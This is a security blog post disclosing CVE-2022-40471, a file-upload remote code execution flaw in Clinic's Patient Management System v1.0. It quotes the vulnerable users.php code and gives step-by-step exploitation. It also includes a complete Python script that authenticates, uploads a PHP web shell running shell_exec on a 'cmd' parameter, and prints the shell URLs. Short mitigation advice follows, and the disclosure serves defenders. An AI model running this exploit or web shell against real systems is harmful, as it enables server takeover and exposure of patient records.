Post

CVE-2022-40471 Remote Code Execution in Clinic's Patient Management System v 1.0

Posted
By RashidKhan Pathan 5 min read

Date: September 9, 2022
Last Updated: October 16, 2022

Exploit Source: Exploit Code (exploit code)

Vendor Homepage: Clinic’s Patient Management System Source Code

Software Link: Download Clinic’s Patient Management System v1.0

Tested Platforms: Windows 10, Kali Linux

Description:

The Clinic’s Patient Management System v1.0 contains a severe vulnerability (CVE-2022-40471) allowing remote attackers to execute arbitrary code. This vulnerability arises due to improper handling of user-uploaded profile pictures in the ‘users.php’ module. Malicious actors can exploit this flaw to upload a PHP web shell, gaining unauthorized access and execution capabilities within the system.

Affected components - Source Code

in following Source Code we can see that developer directly allows to upload any media files without restricting an a specific extenstion which means we can upload any extensions file there which is not okay for security reasons and using this functionality flaw, attacker could upload malicious webshell to gain access complete server with root privileges

Vulnerable Page - users.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

  // users.php
  $status = move_uploaded_file(
    $_FILES["profile_picture"]["tmp_name"],
    'user_images/' . $targetFile
  );

  if ($status) {
    try {
      $con->beginTransaction();

      $query = "INSERT INTO `users`(`display_name`,
`user_name`, `password`, `profile_picture`)
VALUES('$displayName', '$userName', '$encryptedPassword', '$targetFile');";

      $stmtUser = $con->prepare($query);
      $stmtUser->execute();

      $con->commit();

      $message = 'user registered successfully';
    } catch (PDOException $ex) {
      $con->rollback();
      echo $ex->getTraceAsString();
      echo $ex->getMessage();
      exit;
    }
  } else {
    $message = 'a problem occured in image uploading.';
  }

  header("location:congratulation.php?goto_page=users.php&message=$message");
  exit;
}

Exploitation Steps:

To exploit this vulnerability, an attacker can perform the following steps:

  1. Create a customized PHP web shell.
  2. Utilize the ‘users.php’ module to upload the crafted web shell as a profile picture, alongside specifying a Display Name, Username, and Password.
  3. Access the uploaded shell via the ‘pms/user_images/’ directory.
  4. Intercept the shell’s URL using BurpSuite and proceed to manipulate system commands by appending them after ‘pms/user_images/.shell.php?cmd=your_command_here’.

Exploit Code Overview:

The provided Python script automates the exploitation process. It conducts authentication with the target, facilitates the upload of the malicious PHP web shell via crafted HTTP requests, and outputs the successful upload URL for the shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107

from bs4 import *
import requests
import sys
import time

class RemoteCodeExecution:
    def auth(target_ip, target_port, uri_path, username, password):
        url = f'http://{target_ip}{uri_path}index.php'
        session = requests.get(url)
        cookies = (f"PHPSESSID={session.cookies['PHPSESSID']}")

        header = {
            'Host': target_ip,
            'Origin': 'http://' + target_ip,
            'Referer': 'http://' + target_ip + uri_path,
            'Cookie': cookies
        }

        data_body = {
            'username': username,
            'password': password,
        }

        url_auth = f'http://{target_ip}:{target_port}{uri_path}index.php'
        authentication = requests.post(url_auth, headers=header, data=data_body)

        if 'false' in authentication.text:
            print('[-] Username or password are incorrect, Try again')
            exit()
        else:
            print("[+] Exploit Title: Remote Code Execution (Authenticated) in Clinic's Patient Management System")
            print("[+] Author: RashidKhan Pathan {iHexCoder}")
            print("[@] Twitter: @itRashid")
            print("")
            time.sleep(1)
            print('[+] Authentication completed successfully,')
            print('[+] Uploading The Webshell')
        
        return cookies

    def exploit(target_ip, target_port, uri_path, cookies):
        header = {
                'Host': target_ip,
                'Content-Type': 'multipart/form-data; boundary=---------------------------405058720612140838201526428067',
                'Content-Length': '777',
                'Origin': 'http://' + target_ip,
                'Connection': 'close',
                'Cookie' : cookies,
                'Referer': 'http://' + target_ip + uri_path + 'users.php',
                'Upgrade-Insecure-Requests': '1'
        }


        data_body = '-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="display_name\r\n\r\nRCEExploit\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="user_name"\r\n\r\nRCEExploit\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="password"\r\n\r\nRCEEXPLOIT\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="profile_picture"; filename="shell.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo shell_exec($_GET["cmd"]); ?>\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="save_user"\r\n\r\n-----------------------------405058720612140838201526428067--"; filename="webshell.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo shell_exec($_GET["cmd"]); ?>\r\n-----------------------------29635348012019605651675807433\r\nContent-Disposition: form-data; name="change\r\n\r\n-----------------------------29635348012019605651675807433--\r\n'
        uplaod_url = f"http://{target_ip}:{target_port}{uri_path}users.php"
        requests.post(uplaod_url, headers=header, data=data_body)


def main():
    
    if len(sys.argv) != 6:
        time.sleep(1)
        print("[+] Author: RashidKhan Pathan {iHexCoder}")
        print("[@] Twitter: @itRashid")

        time.sleep(1)
        print('Incorrect parameters!\r\n[!] Useage: python3 CVE-2022-40471.py <target_ip> <target_port> <target_uri> <username> <password>')
        print("[!] Example: python3 CVE-2022-40471.py 127.0.0.1 80 /pms/ UserName Password")

        exit()
        
    target_ip = sys.argv[1]
    target_port = sys.argv[2]
    uri_path = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
    
    
    cookies = RemoteCodeExecution.auth(target_ip, target_port, uri_path, username, password)
    RemoteCodeExecution.exploit(target_ip, target_port, uri_path, cookies)    
    print(f'[+] Webshell uploaded successfully to: http://{target_ip}:{target_port}{uri_path}user_images/')
    print("[+] Enjoy your shell")
    print("[!] Note: In this Exploitation Scenario, Shell Changes the Random Digit after Uploading")
    print("[!] So Can use Any Uploaded Shell with Random Number ")
    print("[!] Copy The One of The Follwing Shell and Exploit it Using Curl ie: http://YourIP/pms/user_images/1663988032shell.php?cmd=whoami")
    print("")
    print("[+] Uploaded Shell")
    def get_url_paths(url, ext='', params={}):
        response = requests.get(url, params=params)
        if response.ok:
            response_text = response.text
        else:
            return response.raise_for_status()
        soup = BeautifulSoup(response_text, 'html.parser')
        parent = [url + node.get('href') for node in soup.find_all('a') if node.get('href').endswith(ext)]
        return parent

    url = 'http://localhost/pms/user_images/'
    ext = 'php'
    result = get_url_paths(url, ext)
    print(result)

   
    
if __name__ == '__main__':
    main()

Proof Of Concept Screenshot 2022-10-13 053055

Mitigations: Please

Recommendations:

  • Immediate Update: Users are strongly advised to update the Clinic’s Patient Management System to a patched version that addresses this critical vulnerability.
  • Restrict File Uploads: Implement stricter validation mechanisms for file uploads, especially image files, Restrict other extenstions while uploading an image file for profile picture upload functionality and allow only .jpg .png extensions which are only image related to prevent the execution of arbitrary code
  • Regular Security Audits: Conduct regular security audits and penetration testing to identify and patch potential vulnerabilities in the system.

Disclaimer:

This exploit demonstration and information are solely for educational purposes and security awareness. Use this knowledge responsibly and only on systems where you have explicit permission for testing or demonstration. - By Author

Exploit, Remote Code Execution, 0Day
exploit 0Day Remote Code Execution
This post is licensed under CC BY 4.0 by the author.